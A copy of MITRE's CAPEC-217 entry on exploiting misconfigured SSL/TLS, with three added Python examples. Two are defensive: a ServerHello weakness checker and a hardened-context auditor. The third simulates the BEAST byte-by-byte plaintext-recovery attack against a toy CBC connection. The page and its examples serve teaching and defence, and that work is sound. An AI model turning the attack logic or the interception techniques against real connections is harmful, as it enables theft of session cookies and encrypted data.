Effective URL: https://capec.mitre.org/data/definitions/217.html

COMMON ATTACK PATTERN ENUMERATION AND CLASSIFICATION

A Community Resource for Identifying and Understanding Attacks



CAPEC List (Version 3.9)



CAPEC-217: EXPLOITING INCORRECTLY CONFIGURED SSL/TLS

Attack Pattern ID: 217
Abstraction: Standard

Description
An adversary takes advantage of incorrectly configured SSL/TLS communications
that enable access to data intended to be encrypted. The adversary may also use
this type of attack to inject commands or other traffic into the encrypted
stream to compromise either the client or the server.
Extended Description
SSL/TLS communications become vulnerable to this attack when they use outdated
versions and insecure ciphers. Currently, all SSL versions are deprecated and
TLS versions 1.0 and 1.1 are also deprecated due to being insecure. It is still
possible for later versions of TLS to be insecure if they are configured with
insecure ciphers such as 3DES or RC4.
Likelihood Of Attack

Low

Relationships
This table shows the other attack patterns and high level categories that are
related to this attack pattern. These relationships are defined as ChildOf and
ParentOf, and give insight to similar items that may exist at higher and lower
levels of abstraction. In addition, relationships such as CanFollow, PeerOf, and
CanAlsoBe are defined to show similar attack patterns that the user may want to
explore.

Nature   Type                 ID   Name
ChildOf  Meta Attack Pattern  216  Communication Channel Manipulation

(A meta level attack pattern in CAPEC is a decidedly abstract characterization
of a specific methodology or technique used in an attack. A meta attack pattern
is often void of a specific technology or implementation and is meant to provide
an understanding of a high level approach. A meta level attack pattern is a
generalization of a related group of standard level attack patterns. Meta level
attack patterns are particularly useful for architecture and design level threat
modeling exercises.)

This table shows the views that this attack pattern belongs to and top level
categories within that view.

View Name             Top Level Categories
Domains of Attack     Communications
Mechanisms of Attack  Abuse Existing Functionality

Execution Flow
Explore

 1. Determine SSL/TLS Configuration: Determine the SSL/TLS configuration of
    either the server or client being targeted, preferably both. This is not a
    hard requirement, as the adversary can simply assume commonly exploitable
    configuration settings and indiscriminately attempt them.
    
    Techniques: If the target is a webpage, some of the SSL/TLS configuration
    can be viewed through the browser's security information, such as the key
    sizes and cipher being used.

Experiment

 1. Intercept Communication: Provide controlled access to the server by the
    client, either by providing a link for the client to click on, or by
    positioning oneself at a place on the network to intercept and control
    the flow of data between client and server, e.g. AiTM (adversary in the
    middle - CAPEC-94).
    
    Techniques:
     * Create a malicious webpage that looks identical to the target webpage,
       but routes client traffic to the server such that the adversary can
       observe the traffic and perform an adversary in the middle attack.
     * If the adversary has access to the network that either the client or
       server is on, they can attempt to use a packet sniffer to perform an
       adversary in the middle attack.
     * Install a packet sniffer through malware directly on a client device
       that can intercept SSL/TLS traffic and perform an adversary in the
       middle attack.

Exploit

 1. Capture or Manipulate Sensitive Data: Once the adversary has the ability to
    intercept the secure communication, they exploit the incorrectly configured
    SSL/TLS to view the encrypted communication. The adversary can choose to
    just record the secure communication or manipulate the data to achieve a
    desired effect.
    
    Techniques:
     * Use known exploits for old SSL and TLS versions.
     * Use known exploits for weak ciphers such as DES and RC4.
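The Explore step comes down to learning which protocol version and cipher suite the two peers actually negotiate, and anyone on the path sees that in the clear in the ServerHello before any application data flows. The following added example (it is not part of the CAPEC entry or any MITRE tooling) parses a captured TLS ServerHello record and reports the properties this attack pattern relies on. The records it parses are constructed inline by `build_server_hello`, the cipher-suite table is a small subset of the IANA registry, and `assess` is an illustrative policy rather than a complete one.

```python
import struct

TLS_VERSIONS = {0x0300: "SSLv3", 0x0301: "TLSv1.0", 0x0302: "TLSv1.1",
                0x0303: "TLSv1.2", 0x0304: "TLSv1.3"}

# Small subset of the IANA cipher suite registry, enough for the samples below.
CIPHER_SUITES = {
    0x0000: "TLS_NULL_WITH_NULL_NULL",
    0x0003: "TLS_RSA_EXPORT_WITH_RC4_40_MD5",
    0x0004: "TLS_RSA_WITH_RC4_128_MD5",
    0x0005: "TLS_RSA_WITH_RC4_128_SHA",
    0x0009: "TLS_RSA_WITH_DES_CBC_SHA",
    0x000A: "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
    0x002F: "TLS_RSA_WITH_AES_128_CBC_SHA",
    0x0035: "TLS_RSA_WITH_AES_256_CBC_SHA",
    0x009D: "TLS_RSA_WITH_AES_256_GCM_SHA384",
    0xC012: "TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA",
    0xC014: "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA",
    0xC02C: "TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384",
    0xC030: "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384",
    0x1301: "TLS_AES_128_GCM_SHA256",
    0x1302: "TLS_AES_256_GCM_SHA384",
    0x1303: "TLS_CHACHA20_POLY1305_SHA256",
}
WEAK_MARKERS = ("NULL", "EXPORT", "RC4", "DES")   # "DES" also catches 3DES
EXT_SUPPORTED_VERSIONS = 0x002B


def build_server_hello(legacy_version, cipher_suite, selected_version=None):
    """Constructed sample: one TLS record carrying a minimal ServerHello.
    TLS 1.3 carries the negotiated version in the supported_versions extension
    rather than in the legacy_version field, so the builder can emit that."""
    body = struct.pack("!H", legacy_version) + b"\x11" * 32   # version, random
    body += b"\x00"                                            # empty session_id
    body += struct.pack("!HB", cipher_suite, 0)                # suite, null compression
    if selected_version is not None:
        ext = struct.pack("!HHH", EXT_SUPPORTED_VERSIONS, 2, selected_version)
        body += struct.pack("!H", len(ext)) + ext
    handshake = b"\x02" + len(body).to_bytes(3, "big") + body  # type 2 = ServerHello
    return b"\x16" + struct.pack("!HH", legacy_version, len(handshake)) + handshake


def parse_server_hello(record):
    """Return the negotiated version, cipher suite and compression method from a
    handshake record that carries a ServerHello."""
    content_type, _rec_version, rec_len = struct.unpack("!BHH", record[:5])
    if content_type != 0x16:
        raise ValueError("not a handshake record")
    handshake = record[5:5 + rec_len]
    if handshake[0] != 0x02:
        raise ValueError("not a ServerHello")
    body = handshake[4:4 + int.from_bytes(handshake[1:4], "big")]
    version, = struct.unpack("!H", body[:2])
    pos = 2 + 32                              # skip the 32-byte server random
    pos += 1 + body[pos]                      # skip session_id
    cipher_suite, compression = struct.unpack("!HB", body[pos:pos + 3])
    pos += 3
    if pos < len(body):                       # extensions present
        ext_len, = struct.unpack("!H", body[pos:pos + 2])
        pos += 2
        end = pos + ext_len
        while pos + 4 <= end:
            ext_type, ext_size = struct.unpack("!HH", body[pos:pos + 4])
            data = body[pos + 4:pos + 4 + ext_size]
            pos += 4 + ext_size
            if ext_type == EXT_SUPPORTED_VERSIONS and ext_size == 2:
                version, = struct.unpack("!H", data)   # the real TLS 1.3 version
    return {"version": version, "cipher_suite": cipher_suite,
            "compression": compression}


def assess(hello):
    """Illustrative policy: list the properties that make this session a target."""
    findings = []
    name = CIPHER_SUITES.get(hello["cipher_suite"],
                             "unknown suite 0x%04X" % hello["cipher_suite"])
    if hello["version"] < 0x0303:
        findings.append("deprecated protocol " +
                        TLS_VERSIONS.get(hello["version"], hex(hello["version"])))
    if any(m in name for m in WEAK_MARKERS):
        findings.append("weak cipher suite " + name)
    if "_CBC_" in name:
        findings.append("CBC mode, MAC-then-encrypt; prefer an AEAD suite: " + name)
    if name.startswith("TLS_RSA_"):
        findings.append("RSA key exchange, no forward secrecy: " + name)
    if hello["compression"] != 0:
        findings.append("TLS compression enabled")
    return findings


if __name__ == "__main__":
    for sample in (build_server_hello(0x0301, 0x000A),
                   build_server_hello(0x0303, 0xC030),
                   build_server_hello(0x0303, 0x1302, selected_version=0x0304)):
        hello = parse_server_hello(sample)
        print(TLS_VERSIONS[hello["version"]], CIPHER_SUITES[hello["cipher_suite"]],
              assess(hello) or "no findings")
```

Feeding it real traffic means pulling the first handshake record sent by the server out of a capture; the parser deliberately ignores the record-layer version field, because TLS 1.3 servers still put 0x0303 there and only the supported_versions extension tells the truth.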

Prerequisites

Access to the client/server stream.

Skills Required
[Level: High]
The adversary needs real-time access to network traffic in such a manner that
the adversary can grab needed information from the SSL stream, possibly
influence the decided-upon encryption method and options, and perform automated
analysis to decipher encrypted material recovered. Tools exist to automate part
of the tasks, but to successfully use these tools in an attack scenario requires
detailed understanding of the underlying principles.

Resources Required

The adversary needs the ability to sniff traffic, and optionally be able to
route said traffic to a system where the sniffing of traffic can take place, and
act upon the recovered traffic in real time.

Consequences
This table specifies different individual consequences associated with the
attack pattern. The Scope identifies the security property that is violated,
while the Impact describes the negative technical impact that arises if an
adversary succeeds in their attack. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a
pattern will be used to achieve a certain impact, but a low likelihood that it
will be exploited to achieve a different impact.

Scope                                           Impact           Likelihood
Confidentiality                                 Read Data
Confidentiality, Access Control, Authorization  Gain Privileges

Mitigations

Do not use SSL, as all SSL versions have been broken and should not be used. If
TLS is not an option for the client or server, consider setting timeouts on SSL
sessions to extremely low values to lessen the potential impact; this limits
exposure but does not remove the weakness. Only use TLS version 1.2 or later, as
versions 1.0 and 1.1 are insecure. Configure TLS to use secure algorithms. The
current recommendation is ephemeral ECDH (ECDHE) key exchange, ECDSA signatures,
AES-256-GCM, and SHA-384 for the most security.
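The mitigations above translate into a handful of settings on whatever TLS stack the server uses. As an added example, not taken from the CAPEC entry, the following builds a server-side context with Python's standard `ssl` module that applies them (TLS 1.2 floor, ECDHE key exchange, AEAD suites only, no TLS compression) and then audits a context for the ways it can still fall short. The cipher-string syntax is OpenSSL's; `hardened_server_context`, `offered_suites` and `audit_context` are names chosen for this example, and the certificate paths are left to the caller.

```python
import ssl

WEAK_MARKERS = ("RC4", "DES", "NULL", "MD5", "EXPORT")   # "DES" also matches 3DES


def hardened_server_context(certfile=None, keyfile=None):
    """Server context following the mitigations: TLS 1.2 as the floor, ephemeral
    ECDH key exchange, AEAD ciphers only, and TLS compression disabled."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    # OpenSSL cipher string governing TLS 1.2 and below. TLS 1.3 suites are
    # AEAD-only and (EC)DHE-only by construction, so they need no filtering.
    ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:!aNULL:!MD5:!RC4:!3DES")
    ctx.options |= ssl.OP_NO_COMPRESSION
    if certfile:
        ctx.load_cert_chain(certfile, keyfile)
    return ctx


def offered_suites(ctx):
    """OpenSSL names of the cipher suites this context will actually negotiate."""
    return [c["name"] for c in ctx.get_ciphers()]


def protocol_floor(ctx):
    """Minimum protocol version as a name, e.g. 'TLSv1_2'."""
    return ctx.minimum_version.name


def audit_context(ctx):
    """Return the ways in which a context still falls short of the mitigations."""
    findings = []
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("minimum protocol version below TLS 1.2")
    if not ctx.options & ssl.OP_NO_COMPRESSION:
        findings.append("TLS compression not disabled")
    for name in offered_suites(ctx):
        if any(m in name for m in WEAK_MARKERS):
            findings.append("weak cipher suite offered: " + name)
        # OpenSSL names TLS 1.2 forward-secret suites "ECDHE-..." / "DHE-..."
        # and TLS 1.3 suites "TLS_..."; anything else is static key exchange.
        elif not name.startswith(("ECDHE-", "DHE-", "TLS_")):
            findings.append("no forward secrecy: " + name)
    return findings


if __name__ == "__main__":
    ctx = hardened_server_context()
    print(protocol_floor(ctx), offered_suites(ctx), audit_context(ctx) or "clean")
```

The audit only sees what the process would offer; a server fronted by a load balancer or reverse proxy terminates TLS there, so the same checks have to be run against that device's configuration, and a probe of the live endpoint is still the final word.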

Example Instances

Using adversary-in-the-middle techniques, an adversary launches a blockwise
chosen-boundary attack to obtain plaintext HTTP headers by taking advantage of
an SSL/TLS session using a block cipher in CBC mode with chained initialization
vectors (IVs), where each record's IV is the last ciphertext block of the
previous record. This allows the adversary to recover session IDs,
authentication cookies, and possibly other valuable data that can be used for
further exploitation. Additionally this could allow for the insertion of data
into the stream, enabling further attacks (CSRF, SQL injection, etc.).
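The instance above is the blockwise chosen-boundary attack on CBC with chained IVs, the attack class publicly demonstrated against TLS 1.0 as BEAST. The added example below is not part of the CAPEC entry: it models one direction of a TLS 1.0 style CBC connection and recovers an attacker-prefixed secret one byte per guess round. The block cipher is a keyed PRF standing in for AES (CBC encryption and this attack only use the forward direction), the key, secret and earlier traffic are constructed inline, and the `victim_send` callback stands in for whatever lets the adversary make the victim transmit a chosen prefix followed by the secret (BEAST used injected script and an HTTP request carrying the session cookie).

```python
import hmac
import hashlib

BLOCK = 16


def block_encrypt(key, block):
    """Stand-in for AES: a keyed PRF truncated to one block. CBC encryption
    and this attack only ever use the forward direction of the cipher."""
    return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK]


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def pad(data):
    """TLS 1.0 style padding: n bytes each holding the value n-1, at least one."""
    n = BLOCK - (len(data) % BLOCK)
    return data + bytes([n - 1]) * n


class ChainedCbcConnection:
    """One direction of a TLS 1.0 CBC connection. The IV of each record is the
    last ciphertext block of the previous record, so anyone watching the wire
    knows the IV the next record will use before that record is sent."""

    def __init__(self, key, initial_iv):
        self.key = key
        self.chain = initial_iv

    def send_record(self, plaintext):
        data = pad(plaintext)
        prev, blocks = self.chain, []
        for i in range(0, len(data), BLOCK):
            prev = block_encrypt(self.key, xor(data[i:i + BLOCK], prev))
            blocks.append(prev)
        self.chain = prev
        return b"".join(blocks)


def beast_recover(conn, victim_send, secret_len):
    """Recover secret_len (<= BLOCK) bytes of a secret the victim appends to an
    attacker-chosen prefix. victim_send(prefix) makes the victim transmit
    prefix + secret over conn and returns the ciphertext; the attacker can also
    transmit chosen plaintext over the same connection."""
    assert 0 < secret_len <= BLOCK
    recovered = b""
    for i in range(secret_len):
        # Chosen boundary: the prefix length leaves exactly one unknown byte
        # in the first block of the victim's record.
        prefix = b"A" * (BLOCK - 1 - i)
        iv_used = conn.chain                   # IV the victim's record chains to
        target = victim_send(prefix)[:BLOCK]   # E((prefix || secret[:i+1]) ^ iv_used)
        for g in range(256):
            guess = prefix + recovered + bytes([g])
            # conn.chain is now the IV our record will use. Cancel it and apply
            # iv_used so block 0 of our record encrypts as E(guess ^ iv_used).
            probe = xor(xor(guess, iv_used), conn.chain)
            if conn.send_record(probe)[:BLOCK] == target:
                recovered += bytes([g])
                break
        else:
            raise RuntimeError("no guess matched; the oracle assumption failed")
    return recovered


def run_demo(key=b"constructed-demo-key", secret=b"sid=7f3a"):
    """Constructed scenario: some earlier traffic sets the chain, then the victim
    is made to send prefix + secret while the attacker probes on the same link."""
    conn = ChainedCbcConnection(key, initial_iv=b"\x00" * BLOCK)
    conn.send_record(b"GET / HTTP/1.0\r\n")            # unrelated earlier record
    victim_send = lambda prefix: conn.send_record(prefix + secret)
    return beast_recover(conn, victim_send, len(secret))


if __name__ == "__main__":
    print(run_demo())
```

Each secret byte costs at most 256 probe records, which is why the attack is practical against a cookie the browser resends on every request. TLS 1.1 and later give every record a fresh explicit IV, so the attacker no longer knows the IV before choosing the plaintext and the equality test above stops working; AEAD suites remove the CBC construction altogether.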

Related Weaknesses
A Related Weakness relationship associates a weakness with this attack pattern.
Each association implies a weakness that must exist for a given attack to be
successful. If multiple weaknesses are associated with the attack pattern, then
any of the weaknesses (but not necessarily all) may be present for the attack to
be successful. Each related weakness is identified by a CWE identifier.

CWE-ID  Weakness Name
201     Insertion of Sensitive Information Into Sent Data

Content History

Submissions
 * 2014-06-23 (Version 2.6), CAPEC Content Team, The MITRE Corporation

Modifications
 * 2015-12-07 (Version 2.8), CAPEC Content Team, The MITRE Corporation:
   Updated Description Summary
 * 2021-06-24 (Version 3.5), CAPEC Content Team, The MITRE Corporation:
   Updated Execution_Flow
 * 2022-02-22 (Version 3.7), CAPEC Content Team, The MITRE Corporation:
   Updated @Name, Description, Example_Instances, Execution_Flow,
   Extended_Description, Mitigations, Resources_Required, Skills_Required

Previous Entry Names
 * 2015-12-07 (Version 2.8): Exploiting Incorrectly Configured SSL Security
   Levels
 * 2022-02-22 (Version 3.7): Exploiting Incorrectly Configured SSL


Page Last Updated or Reviewed: February 22, 2022
 


Use of the Common Attack Pattern Enumeration and Classification (CAPEC), and the
associated references from this website are subject to the Terms of Use. CAPEC
is sponsored by the U.S. Department of Homeland Security (DHS) Cybersecurity and
Infrastructure Security Agency (CISA) and managed by the Homeland Security
Systems Engineering and Development Institute (HSSEDI) which is operated by The
MITRE Corporation (MITRE). Copyright © 2007–2023, The MITRE Corporation. CAPEC
and the CAPEC logo are trademarks of The MITRE Corporation.